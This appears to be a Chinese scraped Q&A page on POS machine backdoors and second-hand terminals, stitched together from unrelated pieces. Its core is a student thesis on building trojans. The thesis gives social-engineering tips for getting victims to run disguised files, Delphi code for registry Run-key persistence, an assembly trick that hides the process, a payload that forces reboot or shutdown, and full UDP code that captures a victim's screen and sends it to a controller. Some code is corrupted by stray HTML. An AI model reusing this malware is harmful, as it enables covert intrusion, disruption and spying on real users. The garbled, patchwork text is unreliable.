pos机后门程序

1、一台二手pos机能卖多少钱?

一般5毛到20元。具体要看你pos机的型号什么的了。

一、为什么要回收旧POS机?
因为回收二手的可以用来给别人免费铺机器赚分润，也可以倒卖，很多商户都想免费用pos机，不想花钱买新的。但是成本谁来买单呢，最后就是羊毛都是出在羊身上。
回收的机子安全性是很低的，没有底层秘钥，随意灌装任何程序，随意加载任何程序，哪怕是想在里面留个后门程序，在有心人的手里都不成问题。
大部分代理一般都无法分辨有没有被安装侧录器，贪图便宜的后果是害人害己，更有部分经营裸机的渠道商，通过回收主流裸机的二手机，回来翻新处理，参杂在新机器中买卖，所以你会发现市场上的裸机价格是如此的多变，没有最低，只有更低。
有的支付公司为了应对市场竞争，以非常低廉接近成本甚至低于成本的价格出售给代理商定制机，但被代理商转手破解后，重当新机以低于市场价的价格贩卖到市场上。混乱的市场让浑水摸鱼者如鱼得水。所以我们在选择POS机的时候一定要注意，不要被低价格低蒙蔽，毕竟会关系到自己的资金安全。

二、回收的POS机里面信息会不会被泄露?
我们可以先了解一下首先POS机的中文意思是销售点，是一种多功能终端，把它安装在信用卡的特约商户和受理网点中与计算机练成网络，就能实现电子资金自动转账。当丢失后或者不用后，最安全的方法就是联系支付公司，或者代理商，进行销户，这样就可以了，虽然个人信息在支付公司还有所保存，但是不用担心，他们一般是不管随便动用的。
POS机本身里面是不保存什么信息的，信息是保存在支付公司的数据库里的，别人拿到你的机器也无法获取你的信息，也刷不掉钱，所以大家也不用过于担心。
无利不起早，面对竞争越来越激烈的市场，很多POS机代理商，就在想办法来降低成本，于是就产生了买卖二手pos机的业务。
正所谓没有买卖就没有伤害，没有万能的金钱，就没有万恶之源，二手的pos机可谓安全度极低，没有底层秘钥，随意灌装任何程序，随意加载任何程序，哪怕是想在里面留个后门程序，在有心人的手里都不成问题。 POS机这要用过了就绑定了，别人拿去刷卡钱也是到你的银行卡上的，没有人买二手的，不安全 现在pos很多，并且免fei送的
一清不跳吗，须要找头潒即可 你有吗我要了

2、电脑网络中的“后门”是什么意思?

电脑网络中的“后门”即是网络的漏洞

一、问题的提出
"The Internet is now more like an unlocked diary,with millions of consumers divulging marketable details of their personal lives,from where they live to what they eat for dinner."这是著名匿名服务器站点Anonymizer上曾有过的一段话。是的，在不知不觉中，E时代已经到来，网络给我们的生活增添了绚丽与多彩。但是，在这五彩缤纷的世界下面，潜伏着一股黑潮暗流--黑客（HACKER）。这个名词越来越引起世人的关注，而且影响越来越大，关于黑客事件的报道也越来越多。黑客是伴随网络产生成长的，是指那些对电脑和网络有狂热兴趣的人，他们不断的研究电脑和网络知识，发现电脑和网络中的漏洞，喜欢挑战高难度的网络系统，千方百计的寻找网络中的大小漏洞，然后向网络管理员提出解决漏洞的建议。真正的黑客大多是赋有正义感的。他们不会恶意侵入他人系统，并且破坏系统程序和数据。但有一些人特别崇拜黑客，喜欢利用电脑网络四处捣乱，到处寻找黑客软件，然后到处搞破坏，这类人应该是网络上最危险的家伙。现在的媒体把这类人是黑客混为一谈，"黑客"一词也因此成了贬义词。
现在的黑客软件十分多，Back Orific、冰河、YAI到处都有。接触网络后，我经常想：黑客软件到底是如何编制的？我能编一个黑客软件多好呀！这到不是想干坏事，因为在网络机房上课时，用一些黑客软件可以作为控制工具来控制学员的机器（如：冰河）。可见黑客软件本身不象病毒是个不好的东西，是可以用在正路上的。经过我的摸索，初步掌握了一些设计方法，主要是特洛伊木马程序。本次毕业设计，我设计一个模拟黑客入侵程序，一个恶作剧程序，一个可以截获网络上别人在机器上干些什么的程序，几个程序纯属用于实验，没有什么其它目的。在这里向各位老师汇报一下。程序设计的语言用的是PASCAL，用DELPHI 4进行编译。

二、"特洛伊木马"如何入侵系统
一个完整的"特洛伊木马"一般分为两个部分：一个是客户服务程序（Client），用它来控制已经打开"后门"的机器；另一个是"后门"程序，用它来开放某台机器。假设我们想控制某台电脑，那么我们通过一些手段来把"后门"程序传到该电脑中并使其运行，这样该电脑就变成了一台特殊的FTP服务器。然后我们使用Client程序就可以控制该电脑了。当然，后门程序如果不运行也就无法发挥作用。因此，就要"诱骗"别人使用后门程序。如果是朋友或熟人，利用他们的信任让他运行就行了；要是陌生人，可以在聊天室中和他们套近乎，一旦取得信任，把程序发给他们，诱骗其运行。当然，程序要隐蔽一些，例如可以把后门程序改名，变为README之类，或改变后缀，变成GIF、BMP等，当他们双击这些文件后就上了"贼船"了。也可以用WINZIP的把后门程序和一些东西制作成一个自解压包，然后利用设定解压后自动运行SETUP程序功能来运行指定的后门程序。总之，要利用一切手段使人家运行后门程序。
木马程序运行后，会通过不同的方式修改系统，以便以后启动系统后自动运行木马。修改方法一般是通过修改注册表：
Hkey_local_machine \Software\Microsoft\Windows\CurrentVersion\Run和
Hkey_local_machine\Software\Microsoft\Windows\CurrentVersion\RunServices中的项目是在系统开机时自动加载的，我们可以在这两添加键值，达到自动启动的目的。以下的这段代码可以修改注册表，并调用API函数判断系统目录，复制文件到其下，以实行入侵系统的目的：

unit Unit1;

interface

uses
Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs,
StdCtrls,registry;
type
TForm1 = class(TForm)
Button1: TButton;
Button2: TButton;
procedure Button1Click(Sender: TObject);
procedure Button2Click(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;

var
Form1: TForm1;

implementation

{$R *.DFM}

procedure TForm1.Button1Click(Sender: TObject);
var
regf:tregistry;
sysdir:pchar;
temp:string;
begin
getmem(sysdir,256);
getsystemdirectory(sysdir,128);
temp:=sysdir+'\client.exe';
freemem(sysdir,256);
regf:=tregistry.create;
regf.rootkey:=hkey_local_machine;
regf.openkey('software\microsoft\windows\currentversion\run',true);
regf.writestring(' ',temp);
regf.free;
copyfile(pchar('hacker.exe'),pchar(temp),true);
end;

procedure TForm1.Button2Click(Sender: TObject);
begin
close;
end;
end.

也有些高明的程序可以感染系统文件，附着在这些程序文件中，以达到其目的。我还没有搞清楚这是怎样办到的。
在Windows中按下Ctrl+Alt+Del可以显示当前运行的程序，这样一来，我们的木马程序不是要露馅了吗？以下这段汇编代码可以很方便的嵌入DELPHI或C++中，让别人看不到你的程序，可以很好的隐藏：
asm
mov ebx,30h
push es
push fs
pop es
mov ebx,es:[ebx]
pop es
mov eax,10800000h
xchg [ebx+20h],eax
end;
为什么这段汇编代码可以隐藏程序呢？据资料分析：在WINDOWS 9X加载应用程序时，FS指向的段就是类似于DOS应用程序的PSP，里面保存着一些有关应用程序重要数据，按下Ctrl+Alt+Del后，对于一个应用程序，若没有可显示的ENABLE窗口的名字，则系统要检查上面程序段中的特定双字是不是10800000h，如果是就不显示这个应用程序的可执行文件的名字。
下面是一个恶作剧的程序，入侵计算机后，每次开机后，随机出现鼠标乱跑并发出怪叫、热启动、强行关机的现象，让你无法进入WINDOWS 9X。对于一般的计算机用户来说，因为找不出这个程序在何处，所以只能格式化系统区，重新安装系统。

program hacker;
uses
windows;
var temp:integer;
begin
asm
mov ebx,30h
push es
push fs
pop es
mov ebx,es:[ebx]
pop es
mov eax,10800000h
xchg [ebx+20h],eax
end;
randomize;
temp:=random(3);
if temp=0 then
while(true) do
begin
messagebeep(0);
SetCursorPos (random(640),random(480));
end
else if temp=1 then
ExitWindowsEx(EWX_REBOOT,0)
else ExitWindowsEx(EWX_SHUTDOWN,0);
end.

有的木马为了防止发现后被清除，在启动时会产生一个备份，一般是感染WINDOWS的系统文件，当木马被发现并清除后，备份会自动激活，使你依然处于远程黑手的控制。比如当前国最盛行的"冰河"，首先会修改注册表的启动项目，将自己复制两份到系统中，分别为KERNEL32.EXE和SYSEXPLE.EXE，并且修改TXT文件的打开方式，一旦KERNEL32.EXE被删除，那么当打开一个TXT文件时，SYSEXPLE.EXE将再产生一个KERNEL32.EXE文件。
另外，有的木马还能在运行后修改文件名，或者复制感染系统后，进行自我销毁，使用户很难进行查找。

三、木马的种类
1、破坏型
惟一的功能就是破坏并且删除文件，可以自动的删除电脑上的DLL、INI、EXE文件。
2、密码发送型
可以找到隐藏密码并把它们发送到指定的信箱。有人喜欢把自己的各种密码以文件的形式存放在计算机中，认为这样方便；还有人喜欢用WINDOWS提供的密码记忆功能，这样就可以不必每次都输入密码了。许多黑客软件可以寻找到这些文件，把它们送到黑客手中。也有些黑客软件长期潜伏，记录操作者的键盘操作，从中寻找有用的密码。
在这里提醒一下，不要认为自己在文档中加了密码而把重要的保密文件存在公用计算机中，那你就大错特错了。别有用心的人完全可以用穷举法暴力破译你的密码。利用WINDOWS API函数EnumWindows和EnumChildWindows对当前运行的所有程序的所有窗口（包括控件）进行遍历，通过窗口标题查找密码输入和出确认重新输入窗口，通过按钮标题查找我们应该单击的按钮，通过ES_PASSWORD查找我们需要键入的密码窗口。向密码输入窗口发送WM_SETTEXT消息模拟输入密码，向按钮窗口发送WM_COMMAND消息模拟单击。在破解过程中，把密码保存在一个文件中，以便在下一个序列的密码再次进行穷举或多部机器同时进行分工穷举，直到找到密码为止。此类程序在黑客网站上唾手可得，精通程序设计的人，完全可以自编一个。
3、远程访问型
最广泛的是特洛伊马，只需有人运行了服务端程序，如果客户知道了服务端的IP地址，就可以实现远程控制。以下的程序可以实现观察"受害者"正在干什么，当然这个程序完全可以用在正道上的，比如监视学生机的操作。
程序中用的UDP（User Datagram Protocol，用户报文协议）是因特网上广泛采用的通信协议之一。与TCP协议不同，它是一种非连接的传输协议，没有确认机制，可靠性不如TCP，但它的效率却比TCP高，用于远程屏幕监视还是比较适合的。它不区分服务器端和客户端，只区分发送端和接收端，编程上较为简单，故选用了UDP协议。本程序中用了DELPHI提供的TNMUDP控件。

受控机程序部分：
让控件CUDP监视受控机的1111端口，当有数据发送到该口时，触发控件CUDP的ONDATARECEIVED事件；REMOTEPORT属性设为2222，当控件CUDP发送数据时，将数据发送到主控机的2222口。

unit Unit1;

interface

uses
Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs,
NMUDP, ComCtrls;

type
Tclient = class(TForm)
cudp: TNMUDP;
Animate1: TAnimate;
procedure FormCreate(Sender: TObject);
procedure FormDestroy(Sender: TObject);
procedure cudpDataReceived(Sender: TComponent; NumberBytes: Integer;
FromIP: String);
private
{ Private declarations }
public
{ Public declarations }
end;

var
client: Tclient;

implementation
const bufsize=2048;//发送每一批数据的缓冲区大小
var
bmpstream:tmemorystream;
leftsize:longint;
{$R *.DFM}

procedure screencap(leftpos,toppos,rightpos,bottompos:integer);
var
recwidth="360px",height="auto" />sourcedc,destdc,bhandle:integer;
bitmap:Tbitmap;
begin
recwidth="360px",height="auto" />recheight:=bottompos-toppos;
sourcedc:=createdc('display','','',nil);
destdc:=createcompatibledc(sourcedc);
bhandle:=createcompatiblebitmap(sourcedc,recwidth="360px",height="auto" />selectobject(destdc,bhandle);
bitblt(destdc,0,0,recwidth="360px",height="auto" />bitmap:=tbitmap.Create;
bitmap.Handle:=bhandle;
bitmap.SaveToStream(bmpstream);
bmpstream.Position:=0;
leftsize:=bmpstream.Size;
bitmap.Free;
deletedc(destdc);
releasedc(bhandle,sourcedc);
end;

procedure Tclient.FormCreate(Sender: TObject);
begin
bmpstream:=tmemorystream.create;
end;

procedure Tclient.FormDestroy(Sender: TObject);
begin
bmpstream.free;
end;

procedure Tclient.cudpDataReceived(Sender: TComponent;
NumberBytes: Integer; FromIP: String);
var
ctrlcode:array[0..29] of char;
buf:array[0..bufsize-1] of char;
tmpstr:string;
sendsize,leftpos,toppos,rightpos,bottompos:integer;
begin
cudp.ReadBuffer(ctrlcode,numberbytes);//读取控制码
if ctrlcode[0]+ctrlcode[1]+ctrlcode[2]+ctrlcode[3]='show'
then
begin//控制码前4位为"SHOW"表示主控机发出了截屏指令
if bmpstream.Size=0 then//没有数据可发，必须截屏生成数据
begin tmpstr:=strpas(ctrlcode);
tmpstr:=copy(tmpstr,5,length(tmpstr)-4);
leftpos:=strtoint(copy(tmpstr,1,pos(':',tmpstr)-1));
tmpstr:=copy(tmpstr,pos(':',tmpstr)+1,length(tmpstr)-pos(':',tmpstr));
toppos:=strtoint(copy(tmpstr,1,pos(':',tmpstr)-1));
tmpstr:=copy(tmpstr,pos(':',tmpstr)+1,length(tmpstr)-pos(':',tmpstr));
rightpos:=strtoint(copy(tmpstr,1,pos(':',tmpstr)-1));
bottompos:=strtoint(copy(tmpstr,pos(':',tmpstr)+1,length(tmpstr)-pos(':',tmpstr)));
screencap(leftpos,toppos,rightpos,bottompos);//调用截屏函数
end;
if leftsize>bufsize then sendsize:=bufsize
else sendsize:=leftsize;
bmpstream.ReadBuffer(buf,sendsize);
leftsize:=leftsize-sendsize;
if leftsize=0 then bmpstream.Clear;
cudp.RemoteHost:=fromip;//FROMIP为主控机IP地址
cudp.SendBuffer(buf,sendsize);//将数据发到主控机的2222端口
end;
end;
end.

主控机程序部分：
让控件SUDP监视主控机的2222端口，当有数据发送到该口时，触发SUDP的ONDATARECEIVED事件；REMOTEPORT属性设为1111，当控件SUDP发送数据时，将数据发到受控机的1111口。

unit Unit1;

interface

uses
Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs,
ExtCtrls, StdCtrls, Buttons, NMUDP;

type
Tsever = class(TForm)
Edit1: TEdit;
Edit2: TEdit;
Label1: TLabel;
Label2: TLabel;
BitBtn1: TBitBtn;
Image1: TImage;
BitBtn2: TBitBtn;
sudp: TNMUDP;
procedure BitBtn2Click(Sender: TObject);
procedure FormCreate(Sender: TObject);
procedure FormDestroy(Sender: TObject);
procedure BitBtn1Click(Sender: TObject);
procedure sudpDataReceived(Sender: TComponent; NumberBytes: Integer;
FromIP: String);
private
{ Private declarations }
public
{ Public declarations }
end;

var
sever: Tsever;

implementation
const bufsize=2048;
var
rsltstream,tmpstream:tmemorystream;
{$R *.DFM}

procedure Tsever.BitBtn2Click(Sender: TObject);
begin
close;
end;

procedure Tsever.FormCreate(Sender: TObject);
begin
rsltstream:=tmemorystream.create;
tmpstream:=tmemorystream.create;
end;

procedure Tsever.FormDestroy(Sender: TObject);
begin
rsltstream.free;
tmpstream.free;
end;

procedure Tsever.BitBtn1Click(Sender: TObject);
var
reqcode:array[0..29] of char;
reqcodestr:string;
begin
reqcodestr:='show'+edit1.text;
strpcopy(reqcode,reqcodestr);
tmpstream.Clear;
rsltstream.Clear;
sudp.RemoteHost:=edit2.Text;
sudp.SendBuffer(reqcode,30);
end;

procedure Tsever.sudpDataReceived(Sender: TComponent; NumberBytes: Integer;
FromIP: String);
var reqcode:array[0..29] of char;
reqcodestr:string;
begin
reqcodestr:='show'+edit1.text;
strpcopy(reqcode,reqcodestr);
sudp.ReadStream(tmpstream);
rsltstream.CopyFrom(tmpstream,numberbytes);
if numberbytes<bufsize then
begin
rsltstream.Position:=0;
image1.Picture.Bitmap.LoadFromStream(rsltstream);
tmpstream.Clear;
rsltstream.Clear;
end
else
begin
tmpstream.Clear;
reqcode:='show';
sudp.RemoteHost:=edit2.Text;
sudp.SendBuffer(reqcode,30);
end;
end;
end.

四、如何预防黑客
黑客程序虽然破坏大，但不是不能防止的。
1、处理好你的密码
我们一般是用账号和密码来上网的，密码的设置无疑是十分讲求技巧的，许多人的安全防范意识差，不注意密码的设置，造成自己的账号被盗用。如今的黑客软件都是挂上密码字典，然后用穷举法进行破解，密码太简单，那么破解的可能性就大了。以下是一些注意事项。
⑴ 密码不可和账号相同，这是最容易被猜到的了。
⑵ 经常更改密码，拿到新账号后要立即更改密码，不要放久了。
⑶ 密码最好多于8个字符，字符越长，破解难度越大。例如WORD文档的密码大于8位后，目前的破解软件几乎无法攻破。另外，最好在密码中加入一些控制键，增加破译难度。千万不可用单一的字母或数字。
⑷ 有人喜欢用自己的生日、电话、身份证号码等作为密码，你不要这样做。
⑸ 密码尽量不要记显眼的纸张上，更不能保存在计算机中，不要贪图一时方便，用WINDOWS提供的保存密码功能。
2、不要运行不明真相的程序
无论都高明的黑客程序，只要你不去运行它，就无法害到你。所以，不可相信网友的话，不要去运行他提供的程序；不要随意去打开别人寄来的附件，无论他把附件中的图片或影片吹得如何好看；要到大的、著名的网站去下载软件，千万不要到不明真象的个人网页下载，因为在那儿你可能下载的病毒和黑客之手；如果你十分羡慕黑客，也请你不要下载所谓的黑客软件，否则你没害到别人，自己反被害了；如果你的机器上有防火墙，在上网时一定要打开，不要怕麻烦。
3、经常检查系统信息
上网过程中，突然觉得计算机工作不对劲时，仿佛感觉有人在遥远的地方遥控你。这时，你必须及时停止手中工作，运行"附件→系统工具→系统信息"，在任务列表中寻找自己不熟悉的或者自己并没有运行的程序，一旦找到程序后应立即终止它的运行，以防后患。
4、最好不去聊天室
我一直认为聊天室没有什么意思，特别对于计算机专业人员，聊天只是浪费时间和金钱，有些恶意的破坏者利用网上聊天室的漏洞干坏事，例如聊天室支持JAVA、HTML等功能，然而，这小小的JAVA也隐藏"杀机"，他可以发给你一个足以让你的机器当机的HTML语句。因为这些语句是不会在聊天室显示出来的，所以你被暗算了可能还不知道。防治的办法是在你的浏览器中关闭你的JAVA脚本。想聊天的，在公共机房聊聊算了，不能在自己的机器上聊天。 就是让攻击者可以在以后的日子里可以随时进行连接的东西，不一定是程序，可能会在你的系统里面留一个后门账户，可以随时进行远程桌面连接的后门账户。 后门就是黑客入侵电脑以后，为了方便下次入侵，在电脑上做的一个手脚。 电脑网络中的“后门”即是网络的漏洞，可能被黑客利用的漏洞。 这些是指木马病毒这些，使用杀毒软件来检测就行了。

3、请问POS机是怎么进行刷卡流程的,那种POS机简单方便啊?

POS机的程序都差不多，一般都是银联提供的。当然也有间连POS，程序可能有区别。但应该都差不多。刷卡的流程就是选择消费或预授权的菜单——提示刷卡（刷客户卡）——提示输入金额（输入客户消费金额）——提示输入密码（客户输入密码）——如果客户输入密码正确的话会自动打印第一联签购单，由客户签名后商户保管，按任意键打印第二联签购单，交由客户保管——完毕。POS程序都差不多，只有可能是POS设备外观的差别，因此也无所谓简单方便。这些都是正规渠道的POS，其他的不太了解。

4、pos机刷卡时出现程序异常是怎么回事?

可能两个原因：一是流量卡没有钱或者没有插好，该区域信号不好；二是通道后台有问题。建议联系三方机构。
POS（Pointofsales）的中文意思是“销售点”，全称为销售点情报管理系统，是一种配有条码或OCR码技术终端阅读器，有现金或易货额度出纳功能。其主要任务是对商品与媒体交易提供数据服务和管理功能，并进行非现金结算。
POS是一种多功能终端，把它安装在信用卡的特约商户和受理网点中与计算机联成网络，就能实现电子资金自动转账，它具有支持消费、预授权、余额查询和转帐等功能，使用起来安全、快捷、可靠。大宗交易中基本经营情报难以获取，导入POS系统主要是解决零售业信息管理盲点。连锁分店管理信息系统中的重要组成部分。
拓展资料：
POS系统基本原理是先将商品资料创建于计算机文件内，透过计算机收银机联机架构，商品上之条码能透过收银设备上光学读取设备直接读入后（或由键盘直接输入代号）马上可以显示商品信息（单价，部门，折扣。）加速收银速度与正确性。每笔商品销售明细资料（售价，部门，时段，客层）自动记录下来，再由联机架构传回计算机。经由计算机计算处理即能生成各种销售统计分析信息当为经营管理依据。
POS机是通过读卡器读取银行卡上的持卡人磁条信息，由POS操作人员输入交易金额，持卡人输入个人识别信息（即密码），POS把这些信息通过银联中心，上送发卡银行系统，完成联机交易，给出成功与否的信息，并打印相应的票据。POS的应用实现了信用卡、借记卡等银行卡的联机消费，保证了交易的安全、快捷和准确，避免了手工查询黑名单和压单等繁杂劳动，提高了工作效率。
磁条卡模块的设计要求满足三磁道磁卡的需要，即此模块要能阅读1/2、2/3、1/2/3磁道的磁卡。

5、谁知道个人安装POS机需要哪些程序?

第三方支付公司
快钱
富友
银联
杉德
这几个公司都是可以装POS机的
一共有四十家。

个体必须提供执照和税务
法人身份证
银行卡
电话号码
房屋合同
店铺照片
如果你是公司
就必须提供公司
1、税务登记证副本（复印件）
2、营业执照副本（复印件）
3、组织机构代码证副本（复印件）
4、开户银行许可证（复印件）
5、法人身份证复印件，以及公章和人名章
以上五证需加盖公章和法人章
就可以办理
有不懂可以到我公司网站上浏览
http://www.unpos.net
希望这个对你有用哈 安装就插上电源和接上电话线就行，申请就要营业执照和税务登记证，组织机构代码证。还有公章和门口照片

转载请带上网址：http://www.pos-diy.com/posji/25613.html